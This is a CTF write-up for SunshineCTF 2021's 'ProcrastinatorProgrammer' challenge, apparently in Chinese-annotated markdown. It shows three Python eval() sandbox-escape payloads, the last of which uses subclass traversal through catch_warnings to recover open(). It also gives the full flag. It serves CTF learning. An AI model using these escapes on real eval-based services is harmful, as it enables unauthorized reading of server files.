Skip to content
This repository has been archived by the owner on Aug 15, 2023. It is now read-only.

Latest commit

 

History

History
61 lines (36 loc) · 2.7 KB

ProcrastinatorProgrammer.md

File metadata and controls

61 lines (36 loc) · 2.7 KB
Raw

ProcrastinatorProgrammer

I may have procrastinated security for procrastinate.chal.2021.sunshinectf.org:65000. I may have been watching too many Tom Cruise movies instead of releasing this... uh... last year.

But don't worry! The keys to the kingdom are split into three parts... you'll never find them all!

Flag will be given by our backend in the standard sun{} format, but make sure you put all the pieces together!

  1. Part One
Welcome to the ProcrastinatorProgrammer backend.
Please give me an equation! Any equation! I need to be fed some data to do some processing!I'm super secure, and can use all python! I just use `eval()` on your data and then whamo, python does all the work!Whatever you do, don't look at my ./key!

Give me an equation please!

eval(),使用open('key','r').readlines()得到flag的第一部分sun{eval_is

  1. Part Two
Welcome to the ProcrastinatorProgrammer backend.
Please give me an equation! Any equation! I need to be fed some data to do some processing!Due to technical difficulties with the last challenge, I've upped my ante! Now I know it's secure!I'm super secure, and can use most python math! I just use `eval(client_input, \{\}, safe_math_functions)` on your data and then whamo, python does all the work!Whatever you do, don't look at my ./key!
   
Halt in the name of the law!
   
What was the ./key found in the previous challenge?

eval(client_input, {}, safe_math_functions),使用__builtins__['open']('key', 'r').read()得到flag的第二部分_safe_

  1. Part Three
Welcome to the ProcrastinatorProgrammer backend.
Please give me an equation! Any equation! I need to be fed some data to do some processing!Due to technical difficulties with the previous set, I had to remove math lib support! In fact the only thing this can do is add and subtract now!... I think. Google tells me that it's secure now! Well the second result anyhow.I'm super secure, and can use a bit of python math! I just use `eval(client_input, {'__builtins__':\{\}})` on your data and then whamo, python does all the work!Whatever you do, don't look at my ./key!
   
Halt in the name of the law!
   
What was the ./key found in the previous challenge?

eval(client_input, {'__builtins__':{}}),使用

[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ =="catch_warnings"][0]()._module.__builtins__['open']('key', 'r').read()

得到flag的第三部分only_if_you_ast_whitelist_first}

flag:sun{eval_is_safe_only_if_you_ast_whitelist_first}

参考文章: